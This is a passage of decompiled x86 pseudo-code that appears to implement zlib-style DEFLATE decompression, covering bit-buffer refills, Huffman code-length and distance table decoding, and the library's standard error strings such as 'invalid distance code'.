                                                                                        																		__ecx = _v16;
                                                                                        																		__esi = __eax + __esi;
                                                                                        																		__eflags = __esi;
                                                                                        																		__eax = _v48;
                                                                                        																		goto L230;
                                                                                        																	} else {
                                                                                        																		while(1) {
                                                                                        																			__eflags = __ebx;
                                                                                        																			if(__ebx == 0) {
                                                                                        																				goto L108;
                                                                                        																			}
                                                                                        																			__edx =  *__edi & 0x000000ff;
                                                                                        																			__ecx = __esi;
                                                                                        																			__edx = ( *__edi & 0x000000ff) << __cl;
                                                                                        																			__ebx = __ebx - 1;
                                                                                        																			__ecx = _v64;
                                                                                        																			__edi = __edi + 1;
                                                                                        																			_v12 = _v12 + __edx;
                                                                                        																			__esi = __esi + 8;
                                                                                        																			__ecx = _v64 + 3;
                                                                                        																			_v20 = __ebx;
                                                                                        																			_v24 = __edi;
                                                                                        																			__eflags = __esi - _v64 + 3;
                                                                                        																			if(__esi < _v64 + 3) {
                                                                                        																				continue;
                                                                                        																			} else {
                                                                                        																				__edx = _v12;
                                                                                        																				goto L222;
                                                                                        																			}
                                                                                        																			goto L369;
                                                                                        																		}
                                                                                        																		goto L108;
                                                                                        																	}
                                                                                        																}
                                                                                        															} else {
                                                                                        																_v48 = __cl & 0x000000ff;
                                                                                        																__ecx = 2 + (__cl & 0x000000ff);
                                                                                        																_v64 = __ecx;
                                                                                        																__eflags = __esi - __ecx;
                                                                                        																if(__esi >= __ecx) {
                                                                                        																	L214:
                                                                                        																	__ecx = __ah & 0x000000ff;
                                                                                        																	__edx = __edx >> __cl;
                                                                                        																	__esi = __esi - (__ah & 0x000000ff);
                                                                                        																	__ecx = _v16;
                                                                                        																	_v12 = __edx;
                                                                                        																	_v28 = __esi;
                                                                                        																	__eflags =  *(__ecx + 0x6c);
                                                                                        																	if( *(__ecx + 0x6c) == 0) {
                                                                                        																		L236:
                                                                                        																		__eax = _a4;
                                                                                        																		 *(_a4 + 0x18) = "invalid bit length repeat";
                                                                                        																		 *(__ecx + 4) = 0x3f51;
                                                                                        																		goto L271;
                                                                                        																	} else {
                                                                                        																		__edi =  *(__ecx + 0x6c);
                                                                                        																		__eax = __edx;
                                                                                        																		__eax = __edx & 0x00000003;
                                                                                        																		__edx = __edx >> 2;
                                                                                        																		__eax = __eax + 3;
                                                                                        																		__esi = __esi - 2;
                                                                                        																		_v48 = __eax;
                                                                                        																		__edi =  *(__ecx + 0x72 +  *(__ecx + 0x6c) * 2) & 0x0000ffff;
                                                                                        																		_v56 =  *(__ecx + 0x72 +  *(__ecx + 0x6c) * 2) & 0x0000ffff;
                                                                                        																		L230:
                                                                                        																		__ecx =  *(__ecx + 0x6c);
                                                                                        																		__edi = _v16;
                                                                                        																		__ecx = __eax + __ecx;
                                                                                        																		__eax = _v16;
                                                                                        																		_v12 = __edx;
                                                                                        																		_v28 = __esi;
                                                                                        																		 *((intOrPtr*)(_v16 + 0x68)) =  *((intOrPtr*)(_v16 + 0x68)) +  *((intOrPtr*)(_v16 + 0x64));
                                                                                        																		__edi = _v24;
                                                                                        																		__eflags = __ecx -  *((intOrPtr*)(_v16 + 0x68)) +  *((intOrPtr*)(_v16 + 0x64));
                                                                                        																		__ecx = _v16;
                                                                                        																		if(__eflags > 0) {
                                                                                        																			goto L236;
                                                                                        																		} else {
                                                                                        																			__ebx = _v48;
                                                                                        																			__edx = _v56;
                                                                                        																			asm("o16 nop [eax+eax]");
                                                                                        																			do {
                                                                                        																				__eax =  *(__ecx + 0x6c);
                                                                                        																				 *(__ecx + 0x74 +  *(__ecx + 0x6c) * 2) = __dx;
                                                                                        																				__edi =  *(__ecx + 0x6c);
                                                                                        																				__edi =  *(__ecx + 0x6c) + 1;
                                                                                        																				_v64 = __edi;
                                                                                        																				 *(__ecx + 0x6c) = __edi;
                                                                                        																				__ebx = __ebx - 1;
                                                                                        																				__eflags = __ebx;
                                                                                        																			} while (__ebx != 0);
                                                                                        																			__ebx = _v20;
                                                                                        																			__edx = _v12;
                                                                                        																			goto L234;
                                                                                        																		}
                                                                                        																	}
                                                                                        																} else {
                                                                                        																	while(1) {
                                                                                        																		__eflags = __ebx;
                                                                                        																		if(__ebx == 0) {
                                                                                        																			goto L108;
                                                                                        																		}
                                                                                        																		__edx =  *__edi & 0x000000ff;
                                                                                        																		__ecx = __esi;
                                                                                        																		__edx = ( *__edi & 0x000000ff) << __cl;
                                                                                        																		__ebx = __ebx - 1;
                                                                                        																		_v12 = _v12 + (( *__edi & 0x000000ff) << __cl);
                                                                                        																		__edi = __edi + 1;
                                                                                        																		__esi = __esi + 8;
                                                                                        																		_v20 = __ebx;
                                                                                        																		_v24 = __edi;
                                                                                        																		__eflags = __esi - _v64;
                                                                                        																		if(__esi < _v64) {
                                                                                        																			continue;
                                                                                        																		} else {
                                                                                        																			__edx = _v12;
                                                                                        																			goto L214;
                                                                                        																		}
                                                                                        																		goto L369;
                                                                                        																	}
                                                                                        																	goto L108;
                                                                                        																}
                                                                                        															}
                                                                                        														} else {
                                                                                        															__edi = _v16;
                                                                                        															__edx = __edx >> __cl;
                                                                                        															__ecx = __cl & 0x000000ff;
                                                                                        															__esi = __esi - (__cl & 0x000000ff);
                                                                                        															__eax = __eax >> 0x10;
                                                                                        															__ecx = _v16;
                                                                                        															_v12 = __edx;
                                                                                        															_v28 = __esi;
                                                                                        															__ecx =  *(_v16 + 0x6c);
                                                                                        															 *((short*)(__edi + 0x74 +  *(_v16 + 0x6c) * 2)) = __ax;
                                                                                        															__ecx = __edi;
                                                                                        															 *(__ecx + 0x6c) =  *(__ecx + 0x6c) + 1;
                                                                                        															__eax =  *(__ecx + 0x6c);
                                                                                        															_v64 =  *(__ecx + 0x6c);
                                                                                        															goto L234;
                                                                                        														}
                                                                                        													} else {
                                                                                        														while(1) {
                                                                                        															__eflags = __ebx;
                                                                                        															if(__ebx == 0) {
                                                                                        																goto L108;
                                                                                        															}
                                                                                        															__eax =  *__edi & 0x000000ff;
                                                                                        															__ecx = __esi;
                                                                                        															__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        															__ebx = __ebx - 1;
                                                                                        															__ecx = _v56;
                                                                                        															__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        															__eax = _v64;
                                                                                        															__edi = __edi + 1;
                                                                                        															__eax = _v64 & __edx;
                                                                                        															_v20 = __ebx;
                                                                                        															__esi = __esi + 8;
                                                                                        															_v12 = __edx;
                                                                                        															_v24 = __edi;
                                                                                        															__eax =  *(_v56 + (_v64 & __edx) * 4);
                                                                                        															__eax = __eax >> 8;
                                                                                        															__eax = __eax >> 0x10;
                                                                                        															_v48 = __eax >> 8;
                                                                                        															__ecx = __cl & 0x000000ff;
                                                                                        															_v28 = __eax >> 0x10;
                                                                                        															__ebx = _v20;
                                                                                        															__eflags = (__cl & 0x000000ff) - __esi;
                                                                                        															if((__cl & 0x000000ff) > __esi) {
                                                                                        																continue;
                                                                                        															} else {
                                                                                        																goto L207;
                                                                                        															}
                                                                                        															goto L369;
                                                                                        														}
                                                                                        														goto L108;
                                                                                        													}
                                                                                        													goto L369;
                                                                                        													L234:
                                                                                        													 *((intOrPtr*)(__ecx + 0x68)) =  *((intOrPtr*)(__ecx + 0x68)) +  *(__ecx + 0x64);
                                                                                        													__edi = _v24;
                                                                                        													__eflags = _v64 -  *((intOrPtr*)(__ecx + 0x68)) +  *(__ecx + 0x64);
                                                                                        												} while (_v64 <  *((intOrPtr*)(__ecx + 0x68)) +  *(__ecx + 0x64));
                                                                                        												__eax =  *(__ecx + 4);
                                                                                        												L238:
                                                                                        												__eflags = __eax - 0x3f51;
                                                                                        												if(__eax == 0x3f51) {
                                                                                        													goto L271;
                                                                                        												} else {
                                                                                        													__eflags =  *((short*)(__ecx + 0x274));
                                                                                        													if( *((short*)(__ecx + 0x274)) != 0) {
                                                                                        														__eax = __ecx + 0x534;
                                                                                        														 *(__ecx + 0x58) = 9;
                                                                                        														__edx = __ecx + 0x70;
                                                                                        														 *(__ecx + 0x50) = __eax;
                                                                                        														__edi = __ecx + 0x2f4;
                                                                                        														 *__edx = __eax;
                                                                                        														__eax = __ecx + 0x58;
                                                                                        														_v68 = __edx;
                                                                                        														__eax = __ecx + 0x74;
                                                                                        														_v64 = __ecx + 0x2f4;
                                                                                        														__eax = E0018BE70(1, __ecx + 0x74,  *(__ecx + 0x64), __edx, __ecx + 0x58, __ecx + 0x2f4);
                                                                                        														__edi = _v24;
                                                                                        														__ecx = _v16;
                                                                                        														_v52 = __eax;
                                                                                        														__eflags = __eax;
                                                                                        														if(__eax == 0) {
                                                                                        															__edx = _v68;
                                                                                        															 *(__ecx + 0x5c) = 6;
                                                                                        															__eax =  *__edx;
                                                                                        															 *(__ecx + 0x54) =  *__edx;
                                                                                        															__eax = __ecx + 0x5c;
                                                                                        															__eax =  *(__ecx + 0x64);
                                                                                        															__eax = __ecx + __eax * 2;
                                                                                        															__eax = E0018BE70(2, __eax,  *((intOrPtr*)(__ecx + 0x68)), __edx, __ecx + 0x5c, _v64);
                                                                                        															__ecx = _v16;
                                                                                        															_v52 = __eax;
                                                                                        															__eflags = __eax;
                                                                                        															if(__eax == 0) {
                                                                                        																__edx = _a8;
                                                                                        																 *(__ecx + 4) = 0x3f47;
                                                                                        																__eflags = _a8 - 6;
                                                                                        																if(_a8 == 6) {
                                                                                        																	__eax = _v20;
                                                                                        																	goto L110;
                                                                                        																} else {
                                                                                        																	__edx = _v12;
                                                                                        																	goto L247;
                                                                                        																}
                                                                                        															} else {
                                                                                        																__eax = _a4;
                                                                                        																__edx = _v12;
                                                                                        																 *(_a4 + 0x18) = "invalid distances set";
                                                                                        																 *(__ecx + 4) = 0x3f51;
                                                                                        																goto L271;
                                                                                        															}
                                                                                        														} else {
                                                                                        															__eax = _a4;
                                                                                        															__edx = _v12;
                                                                                        															 *(_a4 + 0x18) = "invalid literal/lengths set";
                                                                                        															 *(__ecx + 4) = 0x3f51;
                                                                                        															goto L271;
                                                                                        														}
                                                                                        													} else {
                                                                                        														__eax = _a4;
                                                                                        														 *(_a4 + 0x18) = "invalid code -- missing end-of-block";
                                                                                        														 *(__ecx + 4) = 0x3f51;
                                                                                        														goto L271;
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 0x13:
                                                                                        											L247:
                                                                                        											 *(__ecx + 4) = 0x3f48;
                                                                                        											goto L248;
                                                                                        										case 0x14:
                                                                                        											L248:
                                                                                        											__eflags = __ebx - 6;
                                                                                        											if(__ebx < 6) {
                                                                                        												L252:
                                                                                        												 *(__ecx + 0x1bc8) = 0;
                                                                                        												__eax = 1;
                                                                                        												__ecx =  *(__ecx + 0x58);
                                                                                        												_t683 = (1 << __cl) - 1; // 0x0
                                                                                        												__ecx = _t683;
                                                                                        												__eax = _v16;
                                                                                        												_v68 = __ecx;
                                                                                        												__eax =  *(_v16 + 0x50);
                                                                                        												_v48 =  *(_v16 + 0x50);
                                                                                        												__eax = __ecx;
                                                                                        												__ecx = _v48;
                                                                                        												__eax = __eax & __edx;
                                                                                        												__eax =  *(_v48 + __eax * 4);
                                                                                        												__eax = __eax >> 8;
                                                                                        												__ecx = __cl & 0x000000ff;
                                                                                        												__eflags = (__cl & 0x000000ff) - __esi;
                                                                                        												if((__cl & 0x000000ff) <= __esi) {
                                                                                        													L256:
                                                                                        													__eflags = __al;
                                                                                        													if(__al == 0) {
                                                                                        														L262:
                                                                                        														__edi = _v16;
                                                                                        														goto L263;
                                                                                        													} else {
                                                                                        														__eflags = __al & 0x000000f0;
                                                                                        														if((__al & 0x000000f0) != 0) {
                                                                                        															goto L262;
                                                                                        														} else {
                                                                                        															__ecx = __eax;
                                                                                        															__edi = 1;
                                                                                        															__ecx = __eax >> 8;
                                                                                        															__edx = __eax;
                                                                                        															__ebx = __cl & 0x000000ff;
                                                                                        															__al & 0x000000ff = (__al & 0x000000ff) + __ebx;
                                                                                        															__eax = __eax >> 0x10;
                                                                                        															__edi = 1 << __cl;
                                                                                        															__ecx = __ebx;
                                                                                        															__edi = (1 << __cl) - 1;
                                                                                        															_v56 = __edx;
                                                                                        															(0x00000001 << __cl) - 0x00000001 & _v12 = ((0x00000001 << __cl) - 0x00000001 & _v12) >> __cl;
                                                                                        															__ecx = _v48;
                                                                                        															__edi = __eax + (((0x00000001 << __cl) - 0x00000001 & _v12) >> __cl);
                                                                                        															__eax =  *(_v48 + (__eax + (((0x00000001 << __cl) - 0x00000001 & _v12) >> __cl)) * 4);
                                                                                        															__eax = __eax >> 8;
                                                                                        															__cl & 0x000000ff = (__cl & 0x000000ff) + __ebx;
                                                                                        															__eflags = (__cl & 0x000000ff) + __ebx - __esi;
                                                                                        															if((__cl & 0x000000ff) + __ebx <= __esi) {
                                                                                        																L261:
                                                                                        																__edi = _v16;
                                                                                        																__ebx = _v20;
                                                                                        																__ecx = __dh & 0x000000ff;
                                                                                        																__edx = _v12;
                                                                                        																__edx = _v12 >> __cl;
                                                                                        																__esi = __esi - __ecx;
                                                                                        																 *(__edi + 0x1bc8) = __ecx;
                                                                                        																L263:
                                                                                        																__eax = __eax >> 8;
                                                                                        																__ecx = __cl & 0x000000ff;
                                                                                        																 *(__edi + 0x1bc8) =  *(__edi + 0x1bc8) + __ecx;
                                                                                        																__esi = __esi - __ecx;
                                                                                        																__edx = __edx >> __cl;
                                                                                        																 *(__edi + 0x44) = __eax >> 0x10;
                                                                                        																__ecx = _v16;
                                                                                        																_v12 = __edx;
                                                                                        																_v28 = __esi;
                                                                                        																__eflags = __al;
                                                                                        																if(__al != 0) {
                                                                                        																	__eflags = __al & 0x00000020;
                                                                                        																	if((__al & 0x00000020) == 0) {
                                                                                        																		__eflags = __al & 0x00000040;
                                                                                        																		if((__al & 0x00000040) == 0) {
                                                                                        																			__eax = __al & 0x000000ff;
                                                                                        																			__eax = __al & 0xf;
                                                                                        																			__eflags = __eax;
                                                                                        																			 *(__ecx + 4) = 0x3f49;
                                                                                        																			 *(__ecx + 0x4c) = __eax;
                                                                                        																			goto L274;
                                                                                        																		} else {
                                                                                        																			__eax = _a4;
                                                                                        																			 *(_a4 + 0x18) = "invalid literal/length code";
                                                                                        																			goto L269;
                                                                                        																		}
                                                                                        																	} else {
                                                                                        																		 *(__ecx + 0x1bc8) = 0xffffffff;
                                                                                        																		 *(__ecx + 4) = 0x3f3f;
                                                                                        																		goto L270;
                                                                                        																	}
                                                                                        																} else {
                                                                                        																	 *(__ecx + 4) = 0x3f4d;
                                                                                        																	goto L270;
                                                                                        																}
                                                                                        															} else {
                                                                                        																while(1) {
                                                                                        																	__eax = _v20;
                                                                                        																	__eflags = __eax;
                                                                                        																	if(__eax == 0) {
                                                                                        																		goto L109;
                                                                                        																	}
                                                                                        																	__ebx = _v24;
                                                                                        																	_v20 = __eax;
                                                                                        																	__ecx = __esi;
                                                                                        																	__edi = 1;
                                                                                        																	__esi = __esi + 8;
                                                                                        																	__eax =  *__ebx & 0x000000ff;
                                                                                        																	__ebx = __ebx + 1;
                                                                                        																	_v12 = __eax + _v12;
                                                                                        																	__eax = _v54 & 0x0000ffff;
                                                                                        																	_v24 = __ebx;
                                                                                        																	__ebx = __dh & 0x000000ff;
                                                                                        																	__dl & 0x000000ff = (__dl & 0x000000ff) + __ebx;
                                                                                        																	__edi = 1 << __cl;
                                                                                        																	__ecx = __ebx;
                                                                                        																	(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & _v12;
                                                                                        																	((0x00000001 << __cl) - 0x00000001 & _v12) >> __cl = (((0x00000001 << __cl) - 0x00000001 & _v12) >> __cl) + (_v54 & 0x0000ffff);
                                                                                        																	__eax = _v48;
                                                                                        																	__eax =  *(_v48 + ((((0x00000001 << __cl) - 0x00000001 & _v12) >> __cl) + (_v54 & 0x0000ffff)) * 4);
                                                                                        																	__eax = __eax >> 8;
                                                                                        																	__cl & 0x000000ff = (__cl & 0x000000ff) + __ebx;
                                                                                        																	__eflags = (__cl & 0x000000ff) + __ebx - __esi;
                                                                                        																	if((__cl & 0x000000ff) + __ebx > __esi) {
                                                                                        																		continue;
                                                                                        																	} else {
                                                                                        																		goto L261;
                                                                                        																	}
                                                                                        																	goto L369;
                                                                                        																}
                                                                                        																goto L109;
                                                                                        															}
                                                                                        														}
                                                                                        													}
                                                                                        												} else {
                                                                                        													while(1) {
                                                                                        														__eflags = __ebx;
                                                                                        														if(__ebx == 0) {
                                                                                        															goto L108;
                                                                                        														}
                                                                                        														__eax =  *__edi & 0x000000ff;
                                                                                        														__ecx = __esi;
                                                                                        														__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        														__ebx = __ebx - 1;
                                                                                        														__ecx = _v48;
                                                                                        														__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        														__eax = _v68;
                                                                                        														__edi = __edi + 1;
                                                                                        														__eax = _v68 & __edx;
                                                                                        														_v20 = __ebx;
                                                                                        														__esi = __esi + 8;
                                                                                        														_v12 = __edx;
                                                                                        														_v24 = __edi;
                                                                                        														__eax =  *(_v48 + (_v68 & __edx) * 4);
                                                                                        														__eax = __eax >> 8;
                                                                                        														__ecx = __cl & 0x000000ff;
                                                                                        														__eflags = (__cl & 0x000000ff) - __esi;
                                                                                        														if((__cl & 0x000000ff) > __esi) {
                                                                                        															continue;
                                                                                        														} else {
                                                                                        															goto L256;
                                                                                        														}
                                                                                        														goto L369;
                                                                                        													}
                                                                                        													goto L108;
                                                                                        												}
                                                                                        											} else {
                                                                                        												__eflags = _v32 - 0x102;
                                                                                        												if(_v32 < 0x102) {
                                                                                        													goto L252;
                                                                                        												} else {
                                                                                        													__eax = _a4;
                                                                                        													__edi = _v40;
                                                                                        													 *(__eax + 0xc) = _v40;
                                                                                        													__edi = _v32;
                                                                                        													 *(__eax + 0x10) = _v32;
                                                                                        													__edi = _v24;
                                                                                        													 *__eax = _v24;
                                                                                        													 *(__eax + 4) = __ebx;
                                                                                        													 *(__ecx + 0x3c) = __edx;
                                                                                        													 *(__ecx + 0x40) = __esi;
                                                                                        													__eax = E0018C270(__eax, _v44);
                                                                                        													__eax = _a4;
                                                                                        													__ecx =  *(__eax + 0xc);
                                                                                        													__edi =  *__eax;
                                                                                        													__ebx =  *(__eax + 4);
                                                                                        													_v40 =  *(__eax + 0xc);
                                                                                        													__ecx =  *(__eax + 0x10);
                                                                                        													_v32 =  *(__eax + 0x10);
                                                                                        													__ecx = _v16;
                                                                                        													_v24 = __edi;
                                                                                        													_v20 = __ebx;
                                                                                        													__eflags =  *(__ecx + 4) - 0x3f3f;
                                                                                        													__edx =  *(__ecx + 0x3c);
                                                                                        													__esi =  *(__ecx + 0x40);
                                                                                        													_v12 = __edx;
                                                                                        													_v28 = __esi;
                                                                                        													if( *(__ecx + 4) == 0x3f3f) {
                                                                                        														 *(__ecx + 0x1bc8) = 0xffffffff;
                                                                                        													}
                                                                                        													goto L271;
                                                                                        												}
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 0x15:
                                                                                        											L274:
                                                                                        											__edi =  *(__ecx + 0x4c);
                                                                                        											__eflags = __edi;
                                                                                        											if(__edi == 0) {
                                                                                        												L281:
                                                                                        												__eax =  *(__ecx + 0x44);
                                                                                        												 *(__ecx + 0x1bcc) =  *(__ecx + 0x44);
                                                                                        												 *(__ecx + 4) = 0x3f4a;
                                                                                        												goto L282;
                                                                                        											} else {
                                                                                        												__eflags = __esi - __edi;
                                                                                        												if(__esi >= __edi) {
                                                                                        													L280:
                                                                                        													__ecx = __edi;
                                                                                        													1 = 1 << __cl;
                                                                                        													__esi = __esi - __edi;
                                                                                        													__ecx = _v16;
                                                                                        													(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __edx;
                                                                                        													 *(_v16 + 0x44) =  *(_v16 + 0x44) + ((0x00000001 << __cl) - 0x00000001 & __edx);
                                                                                        													__ecx = __edi;
                                                                                        													__edx = __edx >> __cl;
                                                                                        													__ecx = _v16;
                                                                                        													_v12 = __edx;
                                                                                        													_t754 = __ecx + 0x1bc8;
                                                                                        													 *_t754 = __edi +  *(__ecx + 0x1bc8);
                                                                                        													__eflags =  *_t754;
                                                                                        													goto L281;
                                                                                        												} else {
                                                                                        													__edx = _v24;
                                                                                        													while(1) {
                                                                                        														__eflags = __ebx;
                                                                                        														if(__ebx == 0) {
                                                                                        															goto L108;
                                                                                        														}
                                                                                        														__eax =  *__edx & 0x000000ff;
                                                                                        														__ecx = __esi;
                                                                                        														__eax = ( *__edx & 0x000000ff) << __cl;
                                                                                        														__ebx = __ebx - 1;
                                                                                        														_v12 = _v12 + (( *__edx & 0x000000ff) << __cl);
                                                                                        														__edx = __edx + 1;
                                                                                        														__esi = __esi + 8;
                                                                                        														_v20 = __ebx;
                                                                                        														_v24 = __edx;
                                                                                        														__eflags = __esi - __edi;
                                                                                        														if(__esi < __edi) {
                                                                                        															continue;
                                                                                        														} else {
                                                                                        															__edx = _v12;
                                                                                        															goto L280;
                                                                                        														}
                                                                                        														goto L369;
                                                                                        													}
                                                                                        													goto L108;
                                                                                        												}
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 0x16:
                                                                                        											L282:
                                                                                        											__ecx =  *(__ecx + 0x5c);
                                                                                        											__eax = 1;
                                                                                        											_t760 = (1 << __cl) - 1; // 0x0
                                                                                        											__ecx = _t760;
                                                                                        											__eax = _v16;
                                                                                        											_v68 = __ecx;
                                                                                        											__ecx = __ecx & __edx;
                                                                                        											__edi =  *(_v16 + 0x54);
                                                                                        											_v64 = __edi;
                                                                                        											__eax =  *(__edi + __ecx * 4);
                                                                                        											__eax = __eax >> 8;
                                                                                        											__ecx = __cl & 0x000000ff;
                                                                                        											__eflags = (__cl & 0x000000ff) - __esi;
                                                                                        											if((__cl & 0x000000ff) <= __esi) {
                                                                                        												L287:
                                                                                        												__eflags = __al & 0x000000f0;
                                                                                        												if((__al & 0x000000f0) != 0) {
                                                                                        													__ebx = _v16;
                                                                                        													goto L293;
                                                                                        												} else {
                                                                                        													__ecx = __eax;
                                                                                        													__edi = 1;
                                                                                        													__ecx = __eax >> 8;
                                                                                        													__edx = __eax;
                                                                                        													__ebx = __cl & 0x000000ff;
                                                                                        													__al & 0x000000ff = (__al & 0x000000ff) + __ebx;
                                                                                        													__eax = __eax >> 0x10;
                                                                                        													__edi = 1 << __cl;
                                                                                        													__ecx = __ebx;
                                                                                        													__edi = (1 << __cl) - 1;
                                                                                        													_v56 = __edx;
                                                                                        													(0x00000001 << __cl) - 0x00000001 & _v12 = ((0x00000001 << __cl) - 0x00000001 & _v12) >> __cl;
                                                                                        													__ecx = _v64;
                                                                                        													__edi = __eax + (((0x00000001 << __cl) - 0x00000001 & _v12) >> __cl);
                                                                                        													__eax =  *(_v64 + (__eax + (((0x00000001 << __cl) - 0x00000001 & _v12) >> __cl)) * 4);
                                                                                        													__eax = __eax >> 8;
                                                                                        													__cl & 0x000000ff = (__cl & 0x000000ff) + __ebx;
                                                                                        													__eflags = (__cl & 0x000000ff) + __ebx - __esi;
                                                                                        													if((__cl & 0x000000ff) + __ebx <= __esi) {
                                                                                        														L291:
                                                                                        														__ebx = _v16;
                                                                                        														__ecx = __dh & 0x000000ff;
                                                                                        														__edx = _v12;
                                                                                        														__esi = __esi - __ecx;
                                                                                        														__edx = _v12 >> __cl;
                                                                                        														 *((intOrPtr*)(__ebx + 0x1bc8)) =  *((intOrPtr*)(__ebx + 0x1bc8)) + __ecx;
                                                                                        														L293:
                                                                                        														__eax = __eax >> 8;
                                                                                        														__ecx = __cl & 0x000000ff;
                                                                                        														 *((intOrPtr*)(__ebx + 0x1bc8)) =  *((intOrPtr*)(__ebx + 0x1bc8)) + __ecx;
                                                                                        														__esi = __esi - __ecx;
                                                                                        														__edx = __edx >> __cl;
                                                                                        														_v12 = __edx;
                                                                                        														_v28 = __esi;
                                                                                        														__eflags = __al & 0x00000040;
                                                                                        														if((__al & 0x00000040) == 0) {
                                                                                        															__ecx = __eax;
                                                                                        															__eax = __al & 0x000000ff;
                                                                                        															__ecx = __ecx >> 0x10;
                                                                                        															__eax = __al & 0xf;
                                                                                        															__eflags = __eax;
                                                                                        															 *(__ebx + 0x48) = __ecx;
                                                                                        															__ecx = _v16;
                                                                                        															__ebx = _v20;
                                                                                        															 *(__ecx + 0x4c) = __eax;
                                                                                        															 *(__ecx + 4) = 0x3f4b;
                                                                                        															goto L296;
                                                                                        														} else {
                                                                                        															__eax = _a4;
                                                                                        															__ecx = _v16;
                                                                                        															__ebx = _v20;
                                                                                        															 *(_a4 + 0x18) = "invalid distance code";
                                                                                        															goto L269;
                                                                                        														}
                                                                                        													} else {
                                                                                        														while(1) {
                                                                                        															__eax = _v20;
                                                                                        															__eflags = __eax;
                                                                                        															if(__eax == 0) {
                                                                                        																goto L109;
                                                                                        															}
                                                                                        															__ebx = _v24;
                                                                                        															_v20 = __eax;
                                                                                        															__ecx = __esi;
                                                                                        															__edi = 1;
                                                                                        															__esi = __esi + 8;
                                                                                        															__eax =  *__ebx & 0x000000ff;
                                                                                        															__ebx = __ebx + 1;
                                                                                        															_v12 = __eax + _v12;
                                                                                        															__eax = _v54 & 0x0000ffff;
                                                                                        															_v24 = __ebx;
                                                                                        															__ebx = __dh & 0x000000ff;
                                                                                        															__dl & 0x000000ff = (__dl & 0x000000ff) + __ebx;
                                                                                        															__edi = 1 << __cl;
                                                                                        															__ecx = __ebx;
                                                                                        															(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & _v12;
                                                                                        															((0x00000001 << __cl) - 0x00000001 & _v12) >> __cl = (((0x00000001 << __cl) - 0x00000001 & _v12) >> __cl) + (_v54 & 0x0000ffff);
                                                                                        															__eax = _v64;
                                                                                        															__eax =  *(_v64 + ((((0x00000001 << __cl) - 0x00000001 & _v12) >> __cl) + (_v54 & 0x0000ffff)) * 4);
                                                                                        															__eax = __eax >> 8;
                                                                                        															__cl & 0x000000ff = (__cl & 0x000000ff) + __ebx;
                                                                                        															__eflags = (__cl & 0x000000ff) + __ebx - __esi;
                                                                                        															if((__cl & 0x000000ff) + __ebx > __esi) {
                                                                                        																continue;
                                                                                        															} else {
                                                                                        																goto L291;
                                                                                        															}
                                                                                        															goto L369;
                                                                                        														}
                                                                                        														goto L109;
                                                                                        													}
                                                                                        												}
                                                                                        											} else {
                                                                                        												__edx = _v24;
                                                                                        												while(1) {
                                                                                        													__eflags = __ebx;
                                                                                        													if(__ebx == 0) {
                                                                                        														goto L108;
                                                                                        													}
                                                                                        													__eax =  *__edx & 0x000000ff;
                                                                                        													__ecx = __esi;
                                                                                        													__eax = ( *__edx & 0x000000ff) << __cl;
                                                                                        													__ebx = __ebx - 1;
                                                                                        													__ecx = _v12;
                                                                                        													__edx = __edx + 1;
                                                                                        													__ecx = __eax + _v12;
                                                                                        													_v20 = __ebx;
                                                                                        													__eax = _v68;
                                                                                        													__esi = __esi + 8;
                                                                                        													__eax = _v68 & __ecx;
                                                                                        													_v12 = __ecx;
                                                                                        													_v24 = __edx;
                                                                                        													__eax =  *(__edi + (_v68 & __ecx) * 4);
                                                                                        													__eax = __eax >> 8;
                                                                                        													__ecx = __cl & 0x000000ff;
                                                                                        													__eflags = (__cl & 0x000000ff) - __esi;
                                                                                        													if((__cl & 0x000000ff) > __esi) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														__edx = _v12;
                                                                                        														goto L287;
                                                                                        													}
                                                                                        													goto L369;
                                                                                        												}
                                                                                        												goto L108;
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 0x17:
                                                                                        											L296:
                                                                                        											__edi =  *(__ecx + 0x4c);
                                                                                        											__eflags = __edi;
                                                                                        											if(__edi == 0) {
                                                                                        												L303:
                                                                                        												 *(__ecx + 4) = 0x3f4c;
                                                                                        												goto L304;
                                                                                        											} else {
                                                                                        												__eflags = __esi - __edi;
                                                                                        												if(__esi >= __edi) {
                                                                                        													L302:
                                                                                        													__ecx = __edi;
                                                                                        													1 = 1 << __cl;
                                                                                        													__esi = __esi - __edi;
                                                                                        													__ecx = _v16;
                                                                                        													(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __edx;
                                                                                        													_v28 = __esi;
                                                                                        													 *((intOrPtr*)(_v16 + 0x48)) =  *((intOrPtr*)(_v16 + 0x48)) + ((0x00000001 << __cl) - 0x00000001 & __edx);
                                                                                        													__ecx = __edi;
                                                                                        													__edx = __edx >> __cl;
                                                                                        													__ecx = _v16;
                                                                                        													_v12 = __edx;
                                                                                        													_t827 = __ecx + 0x1bc8;
                                                                                        													 *_t827 = __edi +  *(__ecx + 0x1bc8);
                                                                                        													__eflags =  *_t827;
                                                                                        													goto L303;
                                                                                        												} else {
                                                                                        													__edx = _v24;
                                                                                        													while(1) {
                                                                                        														__eflags = __ebx;
                                                                                        														if(__ebx == 0) {
                                                                                        															goto L108;
                                                                                        														}
                                                                                        														__eax =  *__edx & 0x000000ff;
                                                                                        														__ecx = __esi;
                                                                                        														__eax = ( *__edx & 0x000000ff) << __cl;
                                                                                        														__ebx = __ebx - 1;
                                                                                        														_v12 = _v12 + (( *__edx & 0x000000ff) << __cl);
                                                                                        														__edx = __edx + 1;
                                                                                        														__esi = __esi + 8;
                                                                                        														_v20 = __ebx;
                                                                                        														_v24 = __edx;
                                                                                        														__eflags = __esi - __edi;
                                                                                        														if(__esi < __edi) {
                                                                                        															continue;
                                                                                        														} else {
                                                                                        															__edx = _v12;
                                                                                        															goto L302;
                                                                                        														}
                                                                                        														goto L369;
                                                                                        													}
                                                                                        													goto L108;
                                                                                        												}
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 0x18:
                                                                                        											L304:
                                                                                        											__edi = _v32;
                                                                                        											__eflags = __edi;
                                                                                        											if(__edi == 0) {
                                                                                        												goto L108;
